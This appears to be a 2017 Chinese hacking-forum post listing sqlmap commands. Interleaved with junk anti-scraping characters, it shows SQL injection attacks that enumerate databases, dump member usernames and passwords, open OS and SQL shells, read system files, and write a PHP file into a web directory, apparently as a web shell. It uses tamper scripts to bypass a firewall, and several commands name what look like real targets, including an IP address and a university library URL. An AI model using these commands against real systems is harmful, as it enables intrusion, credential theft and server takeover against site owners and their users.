找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1692|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap, A4 o. G8 G8 P) Z- f! g

# `9 z4 W+ ]( z3 Y5 z* supdate :::::>     in the folder   after  execute    following   order : svn update
2 }6 |8 k  S1 |7 I& J
7 a) E6 j) x( a5 D( R; isqlmap.py -r 1.txt --current-db
  `# J; E4 K& h9 Y0 m1 |' J* a- {7 v: |/ P& s9 H
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
2 B% a% M: Q! s, h2 N( c# x8 |
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
0 K9 m& }' i0 {0 e* I猜解数据库
! g' j  D, d: i% r2 L& W: A: h+ i8 b./sqlmap.py -u "injection-url" --dbs
- W5 w( M5 J' T$ B% Ysqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"* x" \$ V$ v) v9 h( K9 H
8 @) }) Q# [& e2 w8 H+ t) Z
猜解表名0 a3 N8 W3 M5 f  x; x
./sqlmap.py -u "injection-url" -D database_name --tables
: [- W9 i3 S/ T! E0 j, M
8 H8 q; \# ^/ P) B/ f6 n* xsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
4 z5 B8 x4 c8 o9 g) s9 nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
3 u2 h* z( o# o6 W' H7 ^( a, S. n6 I% C& g; T9 Y
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump9 f2 g5 W/ ?. t
  i, |( i7 j1 R5 y6 R1 Y2 [/ d
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
) {7 _; E, d: q+ T6 usqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"/ J; O0 E& u% o: A* g  M% g$ z" r
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
% s+ z  `+ t/ f" h/ J- Qsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
  |+ I" U+ {( s7 F2 l
" d0 M6 F& I% B* k) }sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py") V  K7 [3 o9 s3 \4 _
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"5 W# y& Z, k" l
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
- e/ A( a/ w# Usqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
* _6 m3 H3 t) nsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump+ o; w5 Y/ v0 d9 u

* @9 I. s; O9 W; |9 fsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
' N/ f. X* t( B; Q& v  \" Q; zsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"- V) G4 W0 b( w6 ?
  \1 O. P! c& j: E, ]4 i. w) L
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"3 e5 ]7 o0 L- c$ n! S
猜解列名' Z) j2 Q; g6 E' O/ U/ H$ `
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
/ n( K+ @8 H6 Q( h5 u
8 e7 M# h9 Z/ Tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
4 }( ^. y: J0 _' r  i( ^2 fsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
3 @; A9 D+ i5 @4 `: \9 m1 A) B5 Ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"; w( b- R9 r- t) N+ A
* H4 M7 ]  Z0 l, o! N
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
2 {% I. J6 Y5 Z7 p7 U% h&submit=Go& }( u5 H% j' n
猜解值2 [4 c0 \0 _% |+ J- \3 ]
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump; n3 s3 a, D* `! T& ?0 Y
========================================================( q8 |/ n( v. @
搜索表名中包括mana字符的& ]+ h8 Z. E2 O; e* b6 S6 Z4 t
/sqlmap.py -u "injection-url" -T mana --search
  W+ ]" I+ G5 |3 M8 }返回一个交互式sql shell
& }* @9 M$ @$ M2 i+ ]: x8 X/sqlmap.py -u "injection-url" --sql-shell: q$ J  V5 ?. m
读取指定文件(需权限)
! b8 e% x4 _4 P! G0 D7 X/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
! Q2 ]- ~* q+ g# ^# i/ _+ A查看当前 用户 及 数据库 ! q. N% Z: |1 Q/ L, E3 X
/sqlmap.py -u "injection-url" --current-user --current-db
. l6 s; x6 z9 Z. T- x本地文件 写入 远程目标绝对路径
! P1 u3 R, o+ x/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径: e  A3 u( R& o. v8 P6 B$ V7 i
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" - i: k) R  \; N5 b( f9 L; ~

+ d6 @9 Y/ f# u( _1 a" v  H; lsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% @2 Z, M$ L. |( ?6 ~# F- g查看某用的权限- F$ I6 e5 \7 N0 \* d
/sqlmap.py -u "injection-url" --privileges -U root, _3 `5 @5 S% |5 u" t2 A/ J
查看当前用户是否为dba3 U( E8 ~5 `, s( E2 x, @% |! L0 R
/sqlmap.py -u "injection-url" --is-dba4 _7 ^5 q  Z% \, B  H# k# ^
读取所有数据库用户或指定数据库用户的密码. f/ d+ Z9 F3 `2 y+ R! I
sqlmap.py -r 1.txt --users --passwords
- j5 J( l0 I5 y- K0 ~sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
3 j5 Q; ^2 X; b: \$ ^" a9 a8 m4 O
8 d. \2 O* t+ [( X+ R- S/sqlmap.py -u "injection-url" --passwords -U root
5 P& c+ h% \, ^0 ~8 S" A$ w' y7 T
2 ]' j. t# l6 V  g% N--start&&--stop 与 --first&&--last 的区别, X: j& q- _9 _, e( R
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)& o' C: M) o. ?9 X0 X$ N
1 z+ L, v* M, ]3 F
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
% |# h$ P# V; r/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables1 ^6 f% x+ B3 K% R) M
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
9 [/ k; r8 V/ ]# N: `* N/ h3 L9 N; ~% u( B+ v
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)" c4 \8 i4 s' N/ r3 K
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"4 f) Y+ ~- Z. i6 A

; R" T6 M! i0 V: E1 d2 W1 O# u' [9 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表